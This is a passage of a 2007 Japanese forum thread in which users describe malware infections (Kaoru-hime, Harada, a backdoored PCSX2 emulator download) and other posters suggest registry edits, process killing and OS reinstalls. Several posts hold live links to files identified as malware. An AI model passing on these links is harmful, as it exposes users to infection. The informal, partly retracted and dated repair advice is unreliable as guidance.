て出て落とせない。
7zは圧縮形式のひとつ。
内容はプレステ2のエミュレータと思われ。
落とせないからわからない。
652親切な馬鹿 ◆ZRdbzBqg5A :2007/09/30(日) 21:03:35 ID:nJXgwWQX
>>649
ウィルス対策ソフトで検出されたなら、削除なりなんなりしたほうが良いと思う。
もし心配ならファイル名の変更でファイル自体は残しておけばOK。
653まちがって名前消しちゃいました。:2007/09/30(日) 23:53:42 ID:WoBxRSH1
http://live23.2ch.net/test/read.cgi/livecx/1191154132/

上記のURL踏んだらウイルス検出したんですが、
削除したとのことなので、大丈夫ですかね。
一応再スキャンしてウイルスは
検出されませんでした。

ちなみにノートンアンティウイルス2006です。

危険なウイルスのように危険度が高かったのですが、
大丈夫でしょうか?
654まちがって名前消しちゃいました。:2007/10/01(月) 01:33:40 ID:???
>ノートンアンチウイルス2006

今は、ノートンアンチウイルス2008が出ています。
更新期限が残っていて定義のダウンロードが出来るからといっての安心してはいけません。
2006で検出されないウイルスが2008で検出されることもあります。
キングソフトとかavastとかフリーでも2006よりはましです。
もったいないからといって使い続けていると面倒なことになりますよ。

http://internet.watch.impress.co.jp/cda/news/2005/11/30/10035.html
シマンテックのセキュリティソフト「Norton」シリーズが2ちゃんねるへのアクセスをブロックしているという指摘がある。シマンテックによれば、2ちゃんねるに脆弱性を突く攻撃コードが書き込まれているためだという。

反応するのはノートンだけで別にウイルスではないです。
この攻撃コードでノートンが動かなくなる報告はありません。
大丈夫です。

http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2005-112409-4527-99
Norton Internet Securityが2ちゃんねるへのアクセスを1次的(初期設定なら30分)遮断するだけです。
655親切な馬鹿 ◆ZRdbzBqg5A :2007/10/01(月) 13:24:42 ID:DMdFuwLx
>>650
今日は落とせた。
圧縮ファイルも、解凍ファイルもノートンでは脅威なしだった。
656PC:2007/10/01(月) 16:13:24 ID:VuDdb56+
性能はどうなのか?↓
http://yasuipc.jp/
657まちがって名前消しちゃいました。:2007/10/01(月) 16:17:07 ID:???
>>655
じゃあ解凍して「pcsx2.exe」をダブルクリックしてみろ

>>650
>http://la.gg/upl/PCSX2_0.9.4_Files.7z
これはウイルスです。

対応済ソフト
◆Avira AntiVir 「BDS/Ciadoor.GN.340」
◆Kaspersky 「Backdoor win32 ciadoor.gn」
現状で未対応のソフト
◆norton
◆ウイルスバスター

症状
・アンチウイルスソフトの起動阻止
・右クリックのコピー&貼り付け
・JPGが開けない
・他多数
Backdoorウイルスだが、ネットそのものに繋がらないので意味はない。しかし、「アンチウイルスソフトの起動阻止」するためBackdoorウイルスの扱いを受けている。
トロイ木馬なのは再起動した後、症状が現れるため。
おそらく「システムの復元」を無効にした後、システムを破壊するため。
破壊系ウイルスなので一度感染すると、別のハードディスクにバックアップがない、またはリカバリー領域がない限り復元は出来ない。
破壊するのはシステムファイルの一部だけであるためその他の情報が失われる心配はないが、「クリーンインストール」が面倒である。

「ウイルスバスター」はもともとだめなソフトなので反応しないのは普通。
「norton」が反応しない珍しいウイルス。
単純に「norton」が対応していない「全く新しいウイルス」か「norton」の脆弱性を狙ったウイルスかはわからない。
別に「norton」批判をするつもりはないが、「norton」が万能とゆうわけではない。
「norton」が反応しないからといって安心してはいけない。
だが他のソフトにも得手不得手があるので、「norton」がだめとゆうわけではない。
658まちがって名前消しちゃいました。:2007/10/01(月) 16:23:04 ID:???
>657
>「Backdoorウイルスだが、ネットそのものに繋がらないので意味はない。」
訂正
「Backdoorウイルスだが、ネットそのものに繋がらなくなるので意味はない。」
659親切な馬鹿 ◆ZRdbzBqg5A :2007/10/01(月) 16:27:01 ID:DMdFuwLx
>>657
なるほど。ごめん。ありがとう。
実行まではやってなかったよ。
エミューレータ板でもウィルスらしいて出てたね。
http://pc11.2ch.net/test/read.cgi/software/1187846338/l50
660まちがって名前消しちゃいました。:2007/10/01(月) 17:06:56 ID:???
>>652
ありがと。
661まちがって名前消しちゃいました。:2007/10/02(火) 02:22:12 ID:???
>>657
細かいところまで検証していただき、ありがとうございました。
662まちがって名前消しちゃいました。:2007/10/02(火) 18:45:49 ID:l2WBU9io
どなたかかおる姫のウイルスの対処法をご存じないでしょうか?
やはりこのウイルスはboot.iniを書き換えられてしまうウイルスなんですかね?
663649:2007/10/02(火) 21:01:37 ID:???
>>652
ありがと。と言っておいてなんだけど、まだ削除できていません。
SYSTEM32の中にあるはずのIMEPADSV.EXEがどこにもないのです。
ウイルスバスターを使ったのですが、誤認識?誤検出?でしょうか?
664親切な馬鹿 ◆ZRdbzBqg5A :2007/10/02(火) 21:12:11 ID:TMCuEBep
>>663
レジストリにあるかもしんない。
ファイル名を指定して実行でregeditを実行。
編集から検索でIMEPADSV.EXEを検索。
検索オプションは全部つけたままでいいと思う。
見つかったら全部削除するのはちょっと怖いので、.exeを.exとかに変更して様子見。
もし本物のIMEだったら.exを.exeに戻す。

ではどうだろう。
665まちがって名前消しちゃいました。:2007/10/02(火) 21:28:33 ID:???
CCleanerとか使ってみたら?
666まちがって名前消しちゃいました。:2007/10/02(火) 21:45:43 ID:???
http://s-io.mydns.jp/up/1/_/jump/1191236882.zip/attatch
p news

これ解凍したらかおる姫がでてきてすぐ消したんですが
スキャンしたらトロイに感染してました・・・
隔離できませんと書いてあったのですがどうすればいいのでしょうか?
ちなみにウイルスバスター2007使ってます
本当に助けてくださいお願いしますorz
667親切な馬鹿 ◆ZRdbzBqg5A :2007/10/02(火) 21:50:58 ID:TMCuEBep
>>666
とりあえずファイル名がわかるならファイル名検索して直接削除。
削除できなかったらタスクマネージャからプロセスを終了してから削除。
タスクマネージャはCtrl+Alt+Deleteから実行。
プロセスの一覧見てファイル名を探す。
選択してプロセス終了のボタン押す。

タスクマネージャから殺せなかったらユーティリティ
http://www.knonline.net/soft/pub/killpsnt/KillPsNT120.zip
こいつで終了させるXP、2000、2003用
668まちがって名前消しちゃいました。:2007/10/02(火) 22:02:50 ID:???
オンラインスキャンしてみればいい
669まちがって名前消しちゃいました。:2007/10/02(火) 22:07:18 ID:???
>>667やってみます
迅速な解答、非常に感謝です
愛してる
670まちがって名前消しちゃいました。:2007/10/02(火) 22:41:10 ID:K0uotzaa
俺もかおる姫ひっかかった。
VistaHomePremium、まだ再起動してない。どうすればいい?
671親切な馬鹿 ◆ZRdbzBqg5A :2007/10/02(火) 22:59:22 ID:TMCuEBep
>>670
Vistaならシステムの復元でいけるのでは。
ひっかかる前の状態に戻せると思う。
やり方はヘルプを検索してほしい。
672まちがって名前消しちゃいました。:2007/10/02(火) 23:02:23 ID:???
いまおもえばXPだけどその機能ある
673まちがって名前消しちゃいました。:2007/10/03(水) 00:23:05 ID:???
あれ?スキャンしなおしたらウイルスなくなってる
隔離できたのか
674まちがって名前消しちゃいました。:2007/10/03(水) 04:37:10 ID:IHduWh0Z
さっき名前はフォルダだけど、
明らかにアイコンがおかしいのを開いたら原田00でした。
莫迦な僕。

とりあえずzipと画像数点が原田00なjpgに変えられました。
けど他は何もなってないように見えます。
ProgramもDownも異常なし。
だけどぐぐても他に似たような症例見つけられなくてちと不安です
どうなんでしょ。
675まちがって名前消しちゃいました。:2007/10/03(水) 12:29:03 ID:???
原田ウイルスを踏んじまった。すまんググってもよくわからなかったので、ここで教えてくれ。
そのフォルダが入ってるHDDは全部JPGが出来てしまったんだが、まだフォルダの中にあるデータは生きている現状。
調べても、そのデータは削除されていてご愁傷様、しか書いてないんだが、これは再起動した時にそのデータが消える?のか?
676まちがって名前消しちゃいました。:2007/10/03(水) 13:27:44 ID:???
ちなみに、まだ再起動はしていないです。
とりあえず、バスターの該当ウイルス対策(レジストリ削除など)を一通りやって、Program Files中の、原田の痕跡のあるJPGファイルを片っ端から削除。
あと、一応システムの復元をやろうとしてます。(こん時に再起動。)
ここまでで、何か落ち目ありますかね?
ぶっちゃけ、再起動が怖杉。JPG上書きの原田の影響で今あるデータが消えてしまうんじゃないかと、かなり不安。なんかググったらそんなような事例もあるし。
677親切な馬鹿 ◆ZRdbzBqg5A :2007/10/03(水) 13:32:35 ID:xLECqenS
>>676
ごめん。よくわかんないや。
とりあえずレジストリ削除したなら大丈夫だと思うけど、
なんならバックアップをCD-ROMにとってみてはどうか。
Document And Settingsの中身だけでも。
678まちがって名前消しちゃいました。:2007/10/03(水) 13:38:39 ID:???
>>677
一応、踏んだ瞬間にプロセス緊急停止したから、Document And Settingsの方には原田の影響が出てない模様。
ただ、そんなこと言っても俺は原田の知識は無いし、消されない確証は出来ないので、一応バック取った方が良いですね・・・
回答サンクス
679まちがって名前消しちゃいました。:2007/10/03(水) 15:19:13 ID:???
jpgが消えるとか上書きとか書いていますが本当に消えてるんですか?
他のパソコンでjpgを開いてみればわかると思いますがそのPCにもウイルスが感染するか心配ですね。
そもそもセカンドマシン持っているかわからないし、データ移すのめんどいだろうし…

CDやDVDから起動できるlinux
「KNOPPIX」
とゆうものがあります。
linuxですからウイルスに感染してても関係ないです。
「KNOPPIX」はインストール不要ですから削除の必要もないです。
システムを光学メディアから起動しているからです。
windowsが入っているパソコンでも使えます。
「KNOPPIX」でjpg開いて見れば上書きされているかわかると思います。
ウイルスに感染したwindowsのバックアップを取るならlinuxからバックアップしたほうがいいですよ?
「KNOPPIX」はどうせ無料ですし、メインで使うわけではないくあくまでトラブルがあった時に試す程度で…
難点といえば環境にもよりますが容量が大きいのでダウンロードに時間がかかるぐらいでくらいです。
あればいろいろ便利ですよ。
あと、ウイルス削除されたかどうかわからないなら、多少面倒でもいっそクリーンインストールしてしまったほうがいいですよ?
680まちがって名前消しちゃいました。:2007/10/03(水) 15:45:55 ID:C2vYqFXQ
かおる姫のウイルスで開けなくなったんだが
緊急起動ディスク使ったら起動できたんだが
その後間違えて電源落としたら次から緊急起動ディスク使っても起動できなくなったんだが
なんでだ?
681まちがって名前消しちゃいました。:2007/10/03(水) 16:03:15 ID:???
>>679
あぁ、画像上書きは完全にされてるものもあれば、なぜか元の同名ファイルも残っているものもあるんだ。
確認ならとりあえずマンガミーヤにドロップしてどんな画像かは実際に見た。
つか、ファイルデータ量が数百Mあったものが100kbぐらいの画像に変わってる時点で、置き換えられているという確証を得られたんよ。
でも "a.avi" "a.jpg"みたいに元ファイルがまだ残ってるのが多々あってな。途中で原田を消したからかもしれんが。
んで、あーこのデータ無事だじゃあ一安心と思いきや、ちょいググってみたら

> Re: 原田ウイルスMkU ( No.16 )
日時: 2007/04/08 07:12
名前: mon


原田ウィルス2をうっかり踏んでしまい、外付けHDにウィニーを入れていたので慌てて電源断したら例の画像への変換は少量ですみ、
プログラムファイルも無事だったのですが、無事だったダウンフォルダの中身が再起動したら全消しされました。ファイル復旧は無理でしょうかね・・・?


こんなのがあるわけよw
こりゃあそちらが仰る通り、OS再インスコかもわからんね。
682まちがって名前消しちゃいました。:2007/10/03(水) 16:07:18 ID:???
つか、再起動して全部消えるって言うのは、スタートアップにウイルスが組み込まれてるってことだよな?
ってことは、そこら辺をよくチェックしときゃ平気かな?
683まちがって名前消しちゃいました。:2007/10/03(水) 16:12:21 ID:???
>数百Mあったものが100kb
容量が変わっていれば確実ですね。

> Re: 原田ウイルスMkU ( No.16 )
日時: 2007/04/08 07:12
名前: mon

これが本当ならいつデータが消えるかわからないし、精神的にも悪いですね。
とりあえず無事なものだけバックアップとってクリーンインストールしたほうがいいと思います。
684まちがって名前消しちゃいました。:2007/10/03(水) 16:19:39 ID:???
>無事だったダウンフォルダの中身が再起動したら
この意味がよくわかりません。
再起動はOSの再起動なのか外付けハードディスクに対しての再アクセスのことなのか…
それに、単純にスタートアップで起動している可能性もありますがそうでないと厄介です。
とりあえず見るだけ見たらいいと思いますけど…
685まちがって名前消しちゃいました。:2007/10/03(水) 16:30:08 ID:???
>>684
OS・・・じゃないか?
まあスタートアップ云々レジストリ書き換えはシステムの復元で回避できるとして、バックアップとらずに再起動してみようと思う。
まあ消えたら消えたで、なあにかえって免疫が付く、で行こうと思う。
回答ありがとう、ここらで失礼します。連投スマンカッタ。
686まちがって名前消しちゃいました。:2007/10/03(水) 16:31:57 ID:???
こっちもなんかちゃんとした回答できなくてすいません。
687まちがって名前消しちゃいました。:2007/10/03(水) 18:31:44 ID:1+IDTt15
えーかおる姫に引っかかって、外付けHDの中身を一部消されました。
書き換えられたのは外付けだけで、システムはいじられなかったようです。
皆さんお気を付けを。
688まちがって名前消しちゃいました。:2007/10/03(水) 18:35:54 ID:???
馬鹿がウィルスに食われてやんの・・・。ゲラ
689まちがって名前消しちゃいました。:2007/10/03(水) 18:41:07 ID:???
頭がいいとウイルスにかからないと思ってる馬鹿がいるスレ
690まちがって名前消しちゃいました。:2007/10/03(水) 22:00:06 ID:???
かおる姫で消えたデータはたぶんデータ復旧ソフトで復元できると思う。
OSごと失った場合は、別のハードディスクにOS入れて起動し、
被害を受けたハードディスクを復旧ソフトで復元すれば元に戻るかもしれない。
OSが完全に元どおりになるかは分からないけど。
自分で試したわけじゃないので、あくまで自己責任で。
691690:2007/10/03(水) 22:15:55 ID:???
690はかおる姫がデータを消すだけで、消した後に何も書き込んでない前提で書いてます。
間違ってたらごめん。
692まちがって名前消しちゃいました。:2007/10/03(水) 22:42:11 ID:???
データ復旧ソフトの復旧率って・・・
693690:2007/10/03(水) 23:03:58 ID:???
データを消した後、その領域に何も上書きされてなければ復元できるものと思ってた。
適当な事言ってすみません。自分の書込みはすべて忘れてください。
694まちがって名前消しちゃいました。:2007/10/03(水) 23:45:15 ID:???
695まちがって名前消しちゃいました。:2007/10/04(木) 15:13:15 ID:???
ppf3-081.valley.ne.jp
(202.222.154.81)
荒らしIPです どなたか掃除してください
696まちがって名前消しちゃいました。:2007/10/04(木) 15:20:08 ID:???
ウイルスと関係ねー
697まちがって名前消しちゃいました。:2007/10/04(木) 16:32:56 ID:lSKdmFZB
http://imepita.zz.tc/020070817
これウイルスですか?
携帯で踏んでしまいました
698親切な馬鹿 ◆ZRdbzBqg5A :2007/10/04(木) 17:06:32 ID:???
>>697
ウィルスです。
JS.WindowsBombと出ました。
ノートンでも防ぎきれませんでした。OutLookExpressを大量に起動します。
影響を受けるシステム: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
とのことなので携帯は大丈夫かも。
699まちがって名前消しちゃいました。:2007/10/04(木) 17:17:23 ID:???
>>698
ありがとうございます
携帯は大丈夫そうなので一安心しました
700まちがって名前消しちゃいました。:2007/10/04(木) 22:50:55 ID:???
すみませんがVBS.Freelink.Bってどんなウイルスですか?
ノートンが今検出したんですけど。
701まちがって名前消しちゃいました。:2007/10/04(木) 23:51:30 ID:???
まず検索しる
702まちがって名前消しちゃいました。:2007/10/06(土) 02:29:28 ID:yHRWIbwk
ttp://imepita.zz.tc/020070817
これってウイルスですか?ブラクラですか?

どうやってウイルススキャンするのかも分からないばか者です。
教えてください。
703まちがって名前消しちゃいました。:2007/10/06(土) 03:36:34 ID:???
ttp://www4.axfc.net/uploader/14/so/Li_34992.zip.html
vip
もう開いてしまったのですがこれはウイルスでしょうか?
704まちがって名前消しちゃいました。:2007/10/07(日) 01:21:19 ID:fPs21tnV
http://s-io.mydns.jp/up/1/_/jump/1191665119.zip/attatch

これ開いたらPC起動しなくなりました・・・。
どうすればいいですか?
705まちがって名前消しちゃいました。:2007/10/07(日) 01:25:06 ID:???
>>704
今書き込んでるじゃないか
706まちがって名前消しちゃいました。:2007/10/07(日) 01:30:12 ID:fPs21tnV
これは別のPCなんです。
家にはXPとMeがあってこれはMeの方。
XPは起動すると
NTLDR is missing
となります。
セーフモードもだめ。どうすればいいんでしょう・・・。
707まちがって名前消しちゃいました。:2007/10/07(日) 01:36:10 ID:???
>>706
おとなしく修理出すのが吉
下手にいじくると再起不能になる
708まちがって名前消しちゃいました。:2007/10/07(日) 01:40:34 ID:fPs21tnV
>>707
データは消えたりしているんでしょうか。
完全には戻りませんか?
709まちがって名前消しちゃいました。:2007/10/07(日) 01:43:26 ID:???
パソコンが起動しないぐらいのウイルスなんでしょ?
これ以上は言わなくてもわかるよね…
いい勉強になったと思って諦めるが吉

とにかく怪しい場所には行かないこと
これはリアルでもネットでも同じ
710まちがって名前消しちゃいました。:2007/10/07(日) 01:45:37 ID:fPs21tnV
あと、ダウソしたexeは外付けHDDに保存してあるのですが、このPC
でHDD起動しても大丈夫でしょうか?
開いたら削除しますが、HDDからこのPCに感染したりしますか?
711まちがって名前消しちゃいました。:2007/10/07(日) 01:47:40 ID:???
当然ありうる
もしそうなったら2台ともパァ
712まちがって名前消しちゃいました。:2007/10/07(日) 01:48:47 ID:fPs21tnV
>>711
分かりました。ありがとうございます。
修理にだすことにします。
本当にありがとうございました。
713まちがって名前消しちゃいました。:2007/10/07(日) 14:16:22 ID:Lpjridau
ウイルスって隔離してればいいんですか
現在感染したファイルが隔離されているんですが、
消し方がよく分からないもので;;
やっぱ消した方がいいんでしょうか?
714まちがって名前消しちゃいました。:2007/10/07(日) 14:40:30 ID:/pKSCulQ
なんか、パソコンの様子がヘンなんです!
ふたばでエロ画像を見ていたんですが、
あるスレのGIFを開いたら開いた画面が真っ黒になって
たびたび、画像の拡大矢印・・・更新部分の矢印が無くなって、
ヘンな風に画面がでたりするんで・・・
ウイルスバスター2007で検索しても検出されないんです!!
以前ヘンなアドレスにクリックしてそのときはバスターで退治
したハズなんですが、何か関係があるんでしょうか?(ちなみにそのアドレスはもう覚えていない)
情報、退治の仕方を教えてください!
画面は40ぐらい開いていました

715712:2007/10/07(日) 15:31:02 ID:???
どうやらこのスレでかおる姫被害者が勃発しているようですが、
どうやら私もそのようです。
とすると、
かおる姫は外付けHDDに保存してあるわけなのですが、
exe起動しなければ他のPCで削除するだけでかおる姫なくなりますかね?
それとも起動しなくても感染してしまうのでしょうか?
詳しい方、お願いします。
716まちがって名前消しちゃいました。:2007/10/07(日) 15:59:57 ID:???
修理よりOS入れなおせ
717まちがって名前消しちゃいました。:2007/10/07(日) 16:54:28 ID:izFxxSxx
OSはどうやって入れ替えますか?
かおる姫の感染は入れ替えれば直るのでしょうか?
718まちがって名前消しちゃいました。:2007/10/07(日) 17:57:57 ID:lDCoVa/7
直るよ
OSの入れ替えはPC買ってきたときにCDかDVDがついてきたはづだからそれを使う
よくわからなかったら「クリーンインストール」で検索してみればいい
719親切な馬鹿 ◆ZRdbzBqg5A :2007/10/07(日) 19:08:33 ID:bupikoEw
>>717
 OSのCDをCDドライブに入れる。
 起動して直後のPress XX Button Enter BIOS SetUpの表示されてるときにそのXXキー押す。
 BIOS設定画面になるのでメニューからBoot項目を探す。
 Bootの順番がたぶんFDD、HDD、CDの順になってるので、CDを一番目にする。
 やりかたは英語だけど画面に表示されてる。
 設定したらSave&Quitで終わる。
 終わったらPress any Key CD Bootとか出るのでエンターキーでもなんでも押す。
 CDから起動するとメニューが出るので、Windowsの新規インストールを選ぶ。ディスクは初期化する。

こんなかんじ。
720まちがって名前消しちゃいました。:2007/10/07(日) 19:23:08 ID:/pKSCulQ
VBS.Freelink.B
こいつに感染したようですが、レジストリ駆除の仕方がわかりません
というか最後の方の値が無くて削除ができません
どうか教えてください
721親切な馬鹿 ◆ZRdbzBqg5A :2007/10/07(日) 19:42:30 ID:bupikoEw
http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2000-121516-1433-99&tabid=2

ここにレジストリのこと書いてあるけどダメかな。
722まちがって名前消しちゃいました。:2007/10/07(日) 19:50:42 ID:/pKSCulQ
>>721

削除の仕方の↓がない!
Rundll Rundll32.vbs
723親切な馬鹿 ◆ZRdbzBqg5A :2007/10/07(日) 19:57:23 ID:bupikoEw
>>722
レジストリエディタ(ファイル名を指定して実行でregedit)から、
キーたよりに探して、一回クリックしてDelキー。編集メニューから削除でもOK。
724まちがって名前消しちゃいました。:2007/10/07(日) 19:57:32 ID:izFxxSxx
>>718
>>719
どうもありがとうございました
では外付けHDDはもう使えないのでしょうか?
725親切な馬鹿 ◆ZRdbzBqg5A :2007/10/07(日) 20:04:56 ID:bupikoEw
>>724
.exeのファイル名がわかってるなら、そのファイル消して、
消せなかったら動いてるからCtrl+Alt+Deleteでタスクマネージャ起動して
プロセスの一覧からプロセスの終了ぶちかまして、
レジストリも念のために検索して探して消して、
>>723見てね。
それで対策OKだと思う。使えるよ。
726まちがって名前消しちゃいました。:2007/10/07(日) 20:10:16 ID:izFxxSxx
レジストリエディタにウイルスのexeファイルがあったら消す
ということですよね
初心者ですいません
ありがとうございます
727親切な馬鹿 ◆ZRdbzBqg5A :2007/10/07(日) 20:14:47 ID:bupikoEw
>>726
その理解でOK。
そんでもし再起動して動かなくなったらOSのインストールやり直しになる。
念のためシステムのファイルかどうかググッてからのほうがいいかも。
728まちがって名前消しちゃいました。:2007/10/07(日) 20:22:18 ID:izFxxSxx
それは危険ですね……
システムのファイルとはなんでしょうか?
質問ばかりすいません
729親切な馬鹿 ◆ZRdbzBqg5A :2007/10/07(日) 20:27:25 ID:bupikoEw
>>728
WindowsとかWinntフォルダの中にあるOSのファイル。
かおる姫が外付けに居ただけなら、WindowsフォルダとかWinntフォルダの中身が入ってるレジストリは消さないほうが良い。
かおる姫の活動でシステムフォルダにコピーされるようなことがあるとややこしくなる。
いずれにしろ.exeの名前がわかってるなら消しちゃってOK。
730親切な馬鹿 ◆ZRdbzBqg5A :2007/10/07(日) 20:39:12 ID:bupikoEw
よく考えてみたらOSクリーンインストールしたならレジストリは綺麗なはずだな。
ま、念のためだけ。
731まちがって名前消しちゃいました。:2007/10/07(日) 20:39:32 ID:izFxxSxx
はいそうします
ありがとうございました!
732まちがって名前消しちゃいました。:2007/10/07(日) 20:48:36 ID:/pKSCulQ
>>723

そんな高度のこと言われても、オラわかんねえよ!
XPなんですけど

編集メニューはどこにあるんですか?
733親切な馬鹿 ◆ZRdbzBqg5A :2007/10/07(日) 21:08:05 ID:bupikoEw
>>732
レジストリエディタは起動できたのかな?。
スタートのすぐ上にファイル名を指定して実行はあると思う。

問題の個所は発見できたのかな?
ブラウザでフォルダ見るのと同じで、\のかわりにフォルダがあるイメージ。
編集メニューはエディタの上に並んでる「編集」ての押せば出る。
734まちがって名前消しちゃいました。:2007/10/07(日) 21:37:41 ID:/pKSCulQ
余計なレジストリに手を出して消したら
ヤバそうなので、困る!
レジストリ全部の保存の仕方も良くわからないので
どうしようもない
735まちがって名前消しちゃいました。:2007/10/07(日) 21:44:07 ID:/pKSCulQ
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

ここまではいいんだ!!
736親切な馬鹿 ◆ZRdbzBqg5A :2007/10/07(日) 21:44:07 ID:bupikoEw
>>734
ウィルスのとこいじるだけなら実害ないんだけどな。
心配ならレジストリの値が"ファイル名.exe"になってるのを".ex"に変えるだけでもOK。
ファイル名変えちゃえば動かない。
737まちがって名前消しちゃいました。:2007/10/07(日) 21:53:10 ID:/pKSCulQ
>>736

なんかexeがいくつもあるんですが・・・?
最後のRunにいって12あるうち6も
738親切な馬鹿 ◆ZRdbzBqg5A :2007/10/07(日) 21:59:01 ID:bupikoEw
>>737
ごめん。vbsだった。
Rundll RUNDLL.VBS
これVBSからVBとかに変えちゃえばOK。
739まちがって名前消しちゃいました。:2007/10/07(日) 22:06:51 ID:JE7v1aIs
2chのリンク先でキャーって声と怖い女の画像が出て
右下にトロイの木馬がどうのこうのって出たんですが
気味悪いから再起動して今は変わった事ないんですが
ヤバそうですか?
740親切な馬鹿 ◆ZRdbzBqg5A :2007/10/07(日) 22:10:15 ID:bupikoEw
>>739
たぶんただのドッキリGIFアニメだとは思う。
心配だったらオンラインスキャン
※オンラインウイルススキャン
シマンテック セキュリティチェック
   (p)http://www.symantec.com/region/jp/securitycheck/index.html
トレンドマイクロ オンラインスキャン
   (p)http://housecall65.trendmicro.com/
741まちがって名前消しちゃいました。:2007/10/07(日) 22:10:40 ID:WFDc+DPy
742まちがって名前消しちゃいました。:2007/10/07(日) 22:11:22 ID:/pKSCulQ
>>738
Rundll RUNDLL.VBS

これが無いんですよ本当に!!
12あるうちのどれも違う
あるのは
(既定)、BJLamch EXE,CHotkey,imjpmig
IMJPMIG8.1,KTPWare,pccguide.exe,PHIME2002A
PHIME2002ASync,SoundMan,VTTimer,VTTraypです
付き合ってもらって申し訳ありませんが
743親切な馬鹿 ◆ZRdbzBqg5A :2007/10/08(月) 10:26:41 ID:bL5lBI9C
>>742
遅くなってすまぬ。なんか昨夜は2ちゃん全体が死んでたみたいでね。

で、なければいいんじゃないかな。
そこまで感染してなかったのかもしれない。
心配なら検索機能つかうと良い。ctrl+Fでもいいし、編集メニューでで検索選んでもよか。
そんでRUNDLL.VBSを探す。
たぶんないと思うけどね。
744まちがって名前消しちゃいました。:2007/10/08(月) 10:43:18 ID:daVHBF/p
>>744
うんっ!わかった!!・・・じゃなくて・・・

かかったのが、Content.IE5\MXC3AP25\1126151563[1].xml なようなのですが、
そのファイルが探しても見つからないので

とりあえず、Temporary Internet Filesを消せばいいらしいので、
ツール→インターネットオプション→インターネット一時ファイルの
cookieの削除とファイルの削除をしました。
それで、今回 >>721のサイトのウイルス検出をしましたが、見つからなかったので
大丈夫(?)だと思います。
しつこく質問をしたので、気分を害させたと思いますが、どうかお許し下さい。
745親切な馬鹿 ◆ZRdbzBqg5A :2007/10/08(月) 10:52:56 ID:bL5lBI9C
>>744
だいじょぶ。しつこくてもOK。

で、対応はそれでOK。
ネットの掲示板とかにウィルスのコードが貼られててアンチウィルスソフトが反応することがあるけど、
それだったんじゃないかな。
実行形式ではないから実害はなかったと思う。
746まちがって名前消しちゃいました。:2007/10/08(月) 11:16:52 ID:daVHBF/p
>>745

ウイルスのコードといわれてもよく分からないのですが・・・
>>714のようになって本当あせっちゃって!まったく面目無いです・・・
それではもうお世話にならないことを願って!
747まちがって名前消しちゃいました。:2007/10/08(月) 12:05:06 ID:ZgjAcN6J
なんか急にPC重くなったんでAVGとかAd−Awareとかでスキャンしたんだけど何も検出されなくて、Spyware Docter
でスキャンしたら39の感染で1の最高レベルの感染(Bad Site)
と出たんで、お気に入りを全部削除したら感染ゼロになったんだけど
じゃあ最低限のサイトだけ登録しようと思って、自分のブログと他
少し登録して、またスキャンしたら、どうやら自分のブログが最高脅威レベル
の感染源らしいんだけど、これってどうしたら!?
自分のブログ開くたびに何かやらかされてるってことすか?
748まちがって名前消しちゃいました。:2007/10/08(月) 15:28:00 ID:???
ブログさらせよ
749まちがって名前消しちゃいました。:2007/10/08(月) 16:51:32 ID:???
漫画をzipでもらったんですが、その中にウィルスっぽいのがあったらしく
よくみたら.jpg.exeて書いてありました。
開いて以来1分置きぐらいに
Connection refused (Error #10061)
って出てくるようになったんですがどう対処したらいいでしょうか?


750まちがって名前消しちゃいました。:2007/10/08(月) 17:02:01 ID:???
>>749
これからは漫画を自分で購入するようになされば大丈夫です
751まちがって名前消しちゃいました。:2007/10/08(月) 18:57:55 ID:???
>>749
※オンラインウイルススキャン
シマンテック セキュリティチェック
   (p)http://www.symantec.com/region/jp/securitycheck/index.html
トレンドマイクロ オンラインスキャン
   (p)http://housecall65.trendmicro.com/
とりあえずオンラインスキャンでいいから対策しなされ。
削除してくれなかったら自分で削除。
実行中で削除できなかったらタスクマネージャからプロセス殺す。
タスクマネージャはCtrl+alt+deleteでタスクマネージャを起動。
プロセス一覧みて該当の.exeを探してプロセスの終了。
それから問題のファイルを削除する。
752749:2007/10/09(火) 00:24:50 ID:???
>>751
avast!4 Home Editionで個人は無料みたいなんで
ソレやってみたら直りました!
アドバイスありがとうございました。
753まちがって名前消しちゃいました。:2007/10/09(火) 00:58:10 ID:???
さっきタスクバーに知らないアイコンがあるのに気が付き焦ってます。
鉄火面みたいな感じです。
今、シマンテック セキュリティチェック中ですが心配で…。
これってなんですか?教えて下さい。
754まちがって名前消しちゃいました。:2007/10/09(火) 01:17:13 ID:???
DQ_equipped_E
755まちがって名前消しちゃいました。:2007/10/09(火) 03:49:55 ID:l3RxESt3
なんかオンラインスキャンしたらスパイウェアが見つかって、無料のせいか
駆除できないって表示だった。windowsexとかいうファイルで。
で格納されてるとこ見たらあったので削除したんだけど、もうそれでOKなのかな。
今もう一回スキャン中。
756まちがって名前消しちゃいました。:2007/10/09(火) 07:45:44 ID:l3RxESt3
再スキャンしたらなくなってた(・o・)
757まちがって名前消しちゃいました。:2007/10/09(火) 08:01:10 ID:TWX9VslB
758まちがって名前消しちゃいました。:2007/10/09(火) 08:15:32 ID:???
電源入れるとビープ音がして
XP起動できても、スタートがマウスで操作でいません
どうしたらいいでしょうか
759まちがって名前消しちゃいました。:2007/10/09(火) 11:52:33 ID:???
>スタートがマウスで操作でいません

マウスが動かないといいたいの?
マウスが動かないならウイルスよりも接続確認
一度抜いてもう一度さして再起動
760まちがって名前消しちゃいました。:2007/10/09(火) 13:10:58 ID:???
あー、マウス動かないって症状、自分も前になったことある・・・・
で、キーボードもなぜか反応しなくなって。

たしかうちの場合は、起動中にPCIカードに接続されてる機器を
頻繁に抜き差ししたりしたときにカードと本体の接触がおかしくなって
そういうのが原因でマウスとキーボードが反応しなくなった。
ビデオカード取り替えてから治ったような・・・

っていうかあんまり記憶がない・・。
かなりビビッたのは覚えてる。

だってOS入れなおしてもマウスとキーボ反応しなかったし。
つーかOS再インストしてもAdministraterの名前入れられ
なくて困った。
761まちがって名前消しちゃいました。:2007/10/09(火) 13:24:40 ID:???
>スタートがマウスで操作でいません

スタート限定?
762まちがって名前消しちゃいました。:2007/10/09(火) 20:07:45 ID:???
スタートをマウスでクリックしても
一瞬メニューが表示されるだけです
キーボードのwindowsボタン押すと
メニューが表示されて、それをマウスでクリックできます
マウスでクリックできないのはスタートだけみたいです
763まちがって名前消しちゃいました。:2007/10/09(火) 20:27:52 ID:e/uqi9G7
電源が入ってて起動しない場合はウイルスなのでしょうか?
